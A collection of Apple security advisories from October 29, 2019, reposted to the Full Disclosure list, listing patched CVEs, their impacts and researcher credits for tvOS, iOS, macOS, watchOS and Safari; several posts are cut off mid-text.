[FD] APPLE-SA-2019-10-29-3 tvOS 13.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-3 tvOS 13.2 tvOS 13.2 is now available and addresses the following: Accounts Available for: Apple TV 4K and Apple TV HD Impact: A remote attacker may be able to leak memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at Technische Universität Darmstadt App Store Available for: Apple TV 4K and Apple TV HD Impact: A local attacker may be able to login to the account of a previously logged in user without valid credentials. Description: An authentication issue was addressed with improved state management. CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu) Audio Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8785: Ian Beer of Google Project Zero CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure AVEVideoEncoder Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8795: 08Tc3wBB working with SSD Secure Disclosure File System Events Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero Day Initiative Kernel Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2019-8794: 08Tc3wBB working with SSD Secure Disclosure Kernel Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8786: an anonymous researcher WebKit Available for: Apple TV 4K and Apple TV HD Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved state management. CVE-2019-8813: an anonymous researcher WebKit Available for: Apple TV 4K and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8782: Cheolung Lee of LINE+ Security Team CVE-2019-8783: Cheolung Lee of LINE+ Graylab Security Team CVE-2019-8808: found by OSS-Fuzz CVE-2019-8811: Soyeon Park of SSLab at Georgia Tech CVE-2019-8812: an anonymous researcher CVE-2019-8814: Cheolung Lee of LINE+ Security Team CVE-2019-8816: Soyeon Park of SSLab at Georgia Tech CVE-2019-8819: Cheolung Lee of LINE+ Security Team CVE-2019-8820: Samuel Groß of Google Project Zero CVE-2019-8821: Sergei Glazunov of Google Project Zero CVE-2019-8822: Sergei Glazunov of Google Project Zero CVE-2019-8823: Sergei Glazunov of Google Project Zero WebKit Process Model Available for: Apple TV 4K and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8815: Apple Additional recognition CFNetwork We would like to acknowledge Lily Chen of Google for their assistance. Kernel We would like to acknowledge Jann Horn of Google Project Zero for their assistance. WebKit We would like to acknowledge Dlive of Tencent's Xuanwu Lab and Zhiyi Zhang of Codesafe Team of Legendsec at Qi'anxin Group for their assistance. Installation note: Apple TV will periodically check for software updates. Alternatively, you may manually check for software updates by selecting "Settings -> System -> Software Update -> Update Software." To check the current version of software, select "Settings -> General -> About." Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl24p5UpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQBz4uGe3y0M2DIQ/9 FQmnN+1/tdXaFFI1PtdJ9hgXONcdsi+D05mREDTX7v0VaLzChX/N3DccI00Z1uT5 VNKHRjInGYDZoO/UntzAWoZa+tcueaY23XhN9xTYrUlt1Ol1gIsaxTEgPtax4B9A PoqWb6S+oK1SHUxglGnlLtXkcyt3WHJ5iqan7BM9XX6dsriwgoBgKADpFi3FCXoa cFIvpoM6ZhxYyMPpxmMc1IRwgjDwOn2miyjkSaAONXw5R5YGRxSsjq+HkzYE3w1m m2NZElUB1nRmlyuU3aMsHUTxwAnfzryPiHRGUTcNZao39YBsyWz56sr3++g7qmnD uZZzBnISQpC6oJCWclw3UHcKHH+V0+1q059GHBoku6Xmkc5bPRnKdFgSf5OvyQUw
[FD] APPLE-SA-2019-10-29-11 Additional information for APPLE-SA-2019-9-26-8 iOS 13.1 and iPadOS 13.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-11 Additional information for APPLE-SA-2019-9-26-8 iOS 13.1 and iPadOS 13.1 iOS 13.1 and iPadOS 13.1 address the following: AppleFirmwareUpdateKext Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption vulnerability was addressed with improved locking. CVE-2019-8747: Mohamed Ghannam (@_simo36) Entry added October 29, 2019 Audio Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab Entry added October 29, 2019 Books Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: Parsing a maliciously crafted iBooks file may lead to a persistent denial-of-service Description: A resource exhaustion issue was addressed with improved input validation. CVE-2019-8774: Gertjan Franken imec-DistriNet of KU Leuven Entry added October 29, 2019 Kernel Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption vulnerability was addressed with improved locking. CVE-2019-8740: Mohamed Ghannam (@_simo36) Entry added October 29, 2019 Kernel Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: A local app may be able to read a persistent account identifier Description: A validation issue was addressed with improved logic. CVE-2019-8809: Apple Entry added October 29, 2019 Kernel Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: A malicious application may be able to determine kernel memory layout Description: The issue was addressed with improved permissions logic. CVE-2019-8780: Siguza libxslt Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: Multiple issues in libxslt Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2019-8750: found by OSS-Fuzz Entry added October 29, 2019 mDNSResponder Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An attacker in physical proximity may be able to passively observe device names in AWDL communications Description: This issue was resolved by replacing device names with a random identifier. CVE-2019-8799: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universität Darmstadt Entry added October 29, 2019 VoiceOver Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: A person with physical access to an iOS device may be able to access contacts from the lock screen Description: The issue was addressed by restricting options offered on a locked device. CVE-2019-8775: videosdebarraquito WebKit Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: Visiting a maliciously crafted website may reveal browsing history Description: An issue existed in the drawing of web page elements. The issue was addressed with improved logic. CVE-2019-8769: Piérre Reimertz (@reimertz) WebKit Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8710: found by OSS-Fuzz CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin Group CVE-2019-8751: Dongzhuo Zhao working with ADLab of Venustech CVE-2019-8752: Dongzhuo Zhao working with ADLab of Venustech CVE-2019-8763: Sergei Glazunov of Google Project Zero CVE-2019-8765: Samuel Groß of Google Project Zero CVE-2019-8766: found by OSS-Fuzz CVE-2019-8773: found by OSS-Fuzz Additional recognition boringssl We would like to acknowledge Nimrod Aviram of Tel Aviv University, Robert Merget of Ruhr University Bochum, Juraj Somorovsky of Ruhr University Bochum for their assistance. Entry added October 29, 2019 Find My iPhone We would like to acknowledge an anonymous researcher for their assistance. Identity Service We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for their assistance. Notes We would like to acknowledge an anonymous researcher for their assistance. Share
[FD] APPLE-SA-2019-10-29-2 macOS Catalina 10.15.1, Security Update 2019-001 Mojave, Security Update 2019-006 High Sierra
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-2 macOS Catalina 10.15.1, Security Update 2019-001 Mojave, Security Update 2019-006 High Sierra macOS Catalina 10.15.1, Security Update 2019-001 Mojave, Security Update 2019-006 High Sierra are now available and address the following: Accounts Available for: macOS Catalina 10.15 Impact: A remote attacker may be able to leak memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at Technische Universität Darmstadt App Store Available for: macOS Catalina 10.15 Impact: A local attacker may be able to login to the account of a previously logged in user without valid credentials. Description: An authentication issue was addressed with improved state management. CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu) AppleGraphicsControl Available for: macOS Catalina 10.15 Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2019-8817: Arash Tohidi AppleGraphicsControl Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6 Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8716: Zhiyi Zhang of Codesafe Team of Legendsec at Qi'anxin Group, Zhuo Liang of Qihoo 360 Vulcan Team Associated Domains Available for: macOS Catalina 10.15 Impact: Improper URL processing may lead to data exfiltration Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation. CVE-2019-8788: Juha Lindstedt of Pakastin, Mirko Tanania, Rauli Rikama of Zero Keyboard Ltd Audio Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6 Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab Audio Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15 Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8785: Ian Beer of Google Project Zero CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure Books Available for: macOS Catalina 10.15 Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. CVE-2019-8789: Gertjan Franken of imec-DistriNet, KU Leuven Contacts Available for: macOS Catalina 10.15 Impact: Processing a maliciously contact may lead to UI spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com) CUPS Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6 Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: An input validation issue was addressed with improved input validation. CVE-2019-8736: Pawel Gocyla of ING Tech Poland (ingtechpoland.com) CUPS Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6 Impact: Processing a maliciously crafted string may lead to heap corruption Description: A memory consumption issue was addressed with improved memory handling. CVE-2019-8767: Stephen Zeisberg CUPS Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6 Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved validation. CVE-2019-8737: Pawel Gocyla of ING Tech Poland (ingtechpoland.com) File Quarantine Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6 Impact: A malicious application may be able to elevate privileges Description: This issue was addressed by removing the vulnerable code. CVE-2019-8509: CodeColorist of Ant-Financial LightYear Labs File System Events Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15 Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero Day Initiative Graphics Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6 Impact: Processing a malicious shader may result in unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2018-12152: Piotr Bania of Cisco Talos CVE-2018-12153: Piotr Bania of Cisco Talos CVE-2018-12154: Piotr Bania of Cisco Talos Graphics Driver Available for: macOS
[FD] APPLE-SA-2019-10-29-10 Additional information for APPLE-SA-2019-10-07-1 macOS Catalina 10.15
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-10 Additional information for APPLE-SA-2019-10-07-1 macOS Catalina 10.15 macOS Catalina 10.15 addresses the following: AMD Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8748: Lilang Wu and Moony Li of TrendMicro Mobile Security Research Team apache_mod_php Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Multiple issues in PHP Description: Multiple issues were addressed by updating to PHP version 7.3.8. CVE-2019-11041 CVE-2019-11042 Audio Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab Entry added October 29, 2019 Books Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Parsing a maliciously crafted iBooks file may lead to a persistent denial-of-service Description: A resource exhaustion issue was addressed with improved input validation. CVE-2019-8774: Gertjan Franken imec-DistriNet of KU Leuven Entry added October 29, 2019 CFNetwork Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing maliciously crafted web content may lead to a cross site scripting attack Description: This issue was addressed with improved checks. CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland Entry added October 29, 2019 CoreAudio Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing a maliciously crafted movie may result in the disclosure of process memory Description: A memory corruption issue was addressed with improved validation. CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative CoreCrypto Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing a large input may lead to a denial of service Description: A denial of service issue was addressed with improved input validation. CVE-2019-8741: Nicky Mouha of NIST Entry added October 29, 2019 CoreMedia Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8825: Found by GWP-ASan in Google Chrome Entry added October 29, 2019 Crash Reporter Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: The "Share Mac Analytics" setting may not be disabled when a user deselects the switch to share analytics Description: A race condition existed when reading and writing user preferences. This was addressed with improved state handling. CVE-2019-8757: William Cerniuk of Core Development, LLC CUPS Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: An input validation issue was addressed with improved input validation. CVE-2019-8736: Pawel Gocyla of ING Tech Poland
[FD] APPLE-SA-2019-10-29-4 watchOS 6.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-4 watchOS 6.1 watchOS 6.1 is now available and addresses the following: Accounts Available for: Apple Watch Series 1 and later Impact: A remote attacker may be able to leak memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at Technische Universität Darmstadt App Store Available for: Apple Watch Series 1 and later Impact: A local attacker may be able to login to the account of a previously logged in user without valid credentials. Description: An authentication issue was addressed with improved state management. CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu) AppleFirmwareUpdateKext Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption vulnerability was addressed with improved locking. CVE-2019-8747: Mohamed Ghannam (@_simo36) Audio Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8785: Ian Beer of Google Project Zero CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure Contacts Available for: Apple Watch Series 1 and later Impact: Processing a maliciously contact may lead to UI spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com) File System Events Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero Day Initiative Kernel Available for: Apple Watch Series 1 and later Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2019-8794: 08Tc3wBB working with SSD Secure Disclosure Kernel Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8786: an anonymous researcher libxslt Available for: Apple Watch Series 1 and later Impact: Multiple issues in libxslt Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2019-8750: found by OSS-Fuzz VoiceOver Available for: Apple Watch Series 1 and later Impact: A person with physical access to an iOS device may be able to access contacts from the lock screen Description: The issue was addressed by restricting options offered on a locked device. CVE-2019-8775: videosdebarraquito WebKit Available for: Apple Watch Series 1 and later Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved state management. CVE-2019-8764: Sergei Glazunov of Google Project Zero WebKit Available for: Apple Watch Series 1 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin Group CVE-2019-8765: Samuel Groß of Google Project Zero CVE-2019-8766: found by OSS-Fuzz CVE-2019-8808: found by OSS-Fuzz CVE-2019-8811: Soyeon Park of SSLab at Georgia Tech CVE-2019-8812: an anonymous researcher CVE-2019-8816: Soyeon Park of SSLab at Georgia Tech CVE-2019-8820: Samuel Groß of Google Project Zero Additional recognition boringssl We would like to acknowledge Nimrod Aviram of Tel Aviv University, Robert Merget of Ruhr University Bochum, Juraj Somorovsky of Ruhr University Bochum for their assistance. CFNetwork We would like to acknowledge Lily Chen of Google for their assistance. Kernel We would like to acknowledge Jann Horn of Google Project Zero for their assistance. Safari We would like to acknowledge Ron Summers for their assistance. WebKit We would like to acknowledge Zhiyi Zhang of Codesafe Team of Legendsec at Qi'anxin Group for their assistance. Installation note: Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
[FD] APPLE-SA-2019-10-29-6 Additional information for APPLE-SA-2019-9-26-3 iOS 13
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-6 Additional information for APPLE-SA-2019-9-26-3 iOS 13 iOS 13 addresses the following: Bluetooth Available for: iPhone 6s and later Impact: Notification previews may show on Bluetooth accessories even when previews are disabled Description: A logic issue existed with the display of notification previews. This issue was addressed with improved validation. CVE-2019-8711: Arjang of MARK ANTHONY GROUP INC., Cemil Ozkebapci (@cemilozkebapci) of Garanti BBVA, Oguzhan Meral of Deloitte Consulting, Ömer Bozdoğan-Ramazan Atıl Anadolu Lisesi Adana/TÜRKİYE CFNetwork Available for: iPhone 6s and later Impact: Processing maliciously crafted web content may lead to a cross site scripting attack Description: This issue was addressed with improved checks. CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland Entry added October 29, 2019 CoreAudio Available for: iPhone 6s and later Impact: Processing a maliciously crafted movie may result in the disclosure of process memory Description: A memory corruption issue was addressed with improved validation. CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative CoreCrypto Available for: iPhone 6s and later Impact: Processing a large input may lead to a denial of service Description: A denial of service issue was addressed with improved input validation. CVE-2019-8741: Nicky Mouha of NIST Entry added October 29, 2019 CoreMedia Available for: iPhone 6s and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8825: Found by GWP-ASan in Google Chrome Entry added October 29, 2019 Face ID Available for: iPhone 6s and later Impact: A 3D model constructed to look like the enrolled user may authenticate via Face ID Description: This issue was addressed by improving Face ID machine learning models. CVE-2019-8760: Wish Wu (吴潍浠 @wish_wu) of Ant-financial Light-Year Security Lab Foundation Available for: iPhone 6s and later Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2019-8641: Samuel Groß and Natalie Silvanovich of Google Project Zero CVE-2019-8746: Natalie Silvanovich and Samuel Groß of Google Project Zero Entry added October 29, 2019 IOUSBDeviceFamily Available for: iPhone 6s and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8718: Joshua Hill and Sem Voigtländer Entry added October 29, 2019 Kernel Available for: iPhone 6s and later Impact: A local app may be able to read a persistent account identifier Description: A validation issue was addressed with improved logic. CVE-2019-8809: Apple Entry added October 29, 2019 Kernel Available for: iPhone 6s and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2019-8709: derrek (@derrekr6) [confirmed]derrek (@derrekr6) Entry added October 29, 2019 Kernel Available for: iPhone 6s and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8717: Jann Horn of Google Project Zero Entry added October 29, 2019 Kernel Available for: iPhone 6s and later Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8712: Mohamed Ghannam (@_simo36) Entry added October 29, 2019 Kernel Available for: iPhone 6s and later Impact: A malicious application may be able to determine kernel memory layout Description: A memory corruption issue existed in the handling of IPv6 packets. This issue was addressed with improved memory management. CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team Entry added October 29, 2019 Keyboards Available for: iPhone 6s and later Impact: A local user may be able to leak sensitive user information Description: An authentication issue was addressed with improved state management. CVE-2019-8704: 王 邦 宇 (wAnyBug.Com) of SAINTSEC libxml2 Available for: iPhone 6s and later Impact: Multiple issues in libxml2 Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2019-8749: found by OSS-Fuzz CVE-2019-8756: found by OSS-Fuzz Entry added October 29, 2019 Messages Available for: iPhone 6s and later Impact: A person with physical access to an iOS device may be able to access contacts from the lock screen Description: The issue was addressed by restricting options offered on a locked device.
[FD] APPLE-SA-2019-10-29-9 Additional information for APPLE-SA-2019-9-26-6 tvOS 13
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-9 Additional information for APPLE-SA-2019-9-26-6 tvOS 13 tvOS 13 addresses the following: AppleFirmwareUpdateKext Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption vulnerability was addressed with improved locking. CVE-2019-8747: Mohamed Ghannam (@_simo36) Entry added October 29, 2019 Audio Available for: Apple TV 4K and Apple TV HD Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab Entry added October 29, 2019 CFNetwork Available for: Apple TV 4K and Apple TV HD Impact: Processing maliciously crafted web content may lead to a cross site scripting attack Description: This issue was addressed with improved checks. CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland Entry added October 29, 2019 CoreAudio Available for: Apple TV 4K and Apple TV HD Impact: Processing a maliciously crafted movie may result in the disclosure of process memory Description: A memory corruption issue was addressed with improved validation. CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative Entry added October 29, 2019 CoreCrypto Available for: Apple TV 4K and Apple TV HD Impact: Processing a large input may lead to a denial of service Description: A denial of service issue was addressed with improved input validation. CVE-2019-8741: Nicky Mouha of NIST Entry added October 29, 2019 Foundation Available for: Apple TV 4K and Apple TV HD Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2019-8746: Natalie Silvanovich and Samuel Groß of Google Project Zero Entry added October 29, 2019 IOUSBDeviceFamily Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8718: Joshua Hill and Sem Voigtländer Entry added October 29, 2019 Kernel Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption vulnerability was addressed with improved locking. CVE-2019-8740: Mohamed Ghannam (@_simo36) Entry added October 29, 2019 Kernel Available for: Apple TV 4K and Apple TV HD Impact: A local app may be able to read a persistent account identifier Description: A validation issue was addressed with improved logic. CVE-2019-8809: Apple Entry added October 29, 2019 Kernel Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8717: Jann Horn of Google Project Zero Entry added October 29, 2019 Kernel Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8712: Mohamed Ghannam (@_simo36) Entry added October 29, 2019 Kernel Available for: Apple TV 4K and Apple TV HD Impact: A malicious application may be able to determine kernel memory layout Description: A memory corruption issue existed in the handling of IPv6 packets. This issue was addressed with improved memory management. CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team Entry added October 29, 2019 Kernel Available for: Apple TV 4K and Apple TV HD Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2019-8709: derrek (@derrekr6) [confirmed]derrek (@derrekr6) Entry added October 29, 2019 Kernel Available for: Apple TV 4K and Apple TV HD Impact: A malicious application may be able to determine kernel memory layout Description: The issue was addressed with improved permissions logic. CVE-2019-8780: Siguza Entry added October 29, 2019 Keyboards Available for: Apple TV 4K and Apple TV HD Impact: A local user may be able to leak sensitive user information Description: An authentication issue was addressed with improved state management. CVE-2019-8704: 王 邦 宇 (wAnyBug.Com) of SAINTSEC libxml2 Available for: Apple TV 4K and Apple TV HD Impact: Multiple issues in libxml2 Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2019-8749: found by OSS-Fuzz CVE-2019-8756: found by OSS-Fuzz Entry added October 29, 2019 libxslt Available for: Apple TV 4K and Apple TV HD Impact: Multiple issues in libxslt
[FD] APPLE-SA-2019-10-29-5 Safari 13.0.3
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-5 Safari 13.0.3 Safari 13.0.3 is now available and addresses the following: WebKit Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6, and included in macOS Catalina 10.15.1 Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved state management. CVE-2019-8813: an anonymous researcher WebKit Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6, and included in macOS Catalina 10.15.1 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8782: Cheolung Lee of LINE+ Security Team CVE-2019-8783: Cheolung Lee of LINE+ Graylab Security Team CVE-2019-8808: found by OSS-Fuzz CVE-2019-8811: Soyeon Park of SSLab at Georgia Tech CVE-2019-8812: an anonymous researcher CVE-2019-8814: Cheolung Lee of LINE+ Security Team CVE-2019-8816: Soyeon Park of SSLab at Georgia Tech CVE-2019-8819: Cheolung Lee of LINE+ Security Team CVE-2019-8820: Samuel Groß of Google Project Zero CVE-2019-8821: Sergei Glazunov of Google Project Zero CVE-2019-8822: Sergei Glazunov of Google Project Zero CVE-2019-8823: Sergei Glazunov of Google Project Zero WebKit Process Model Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6, 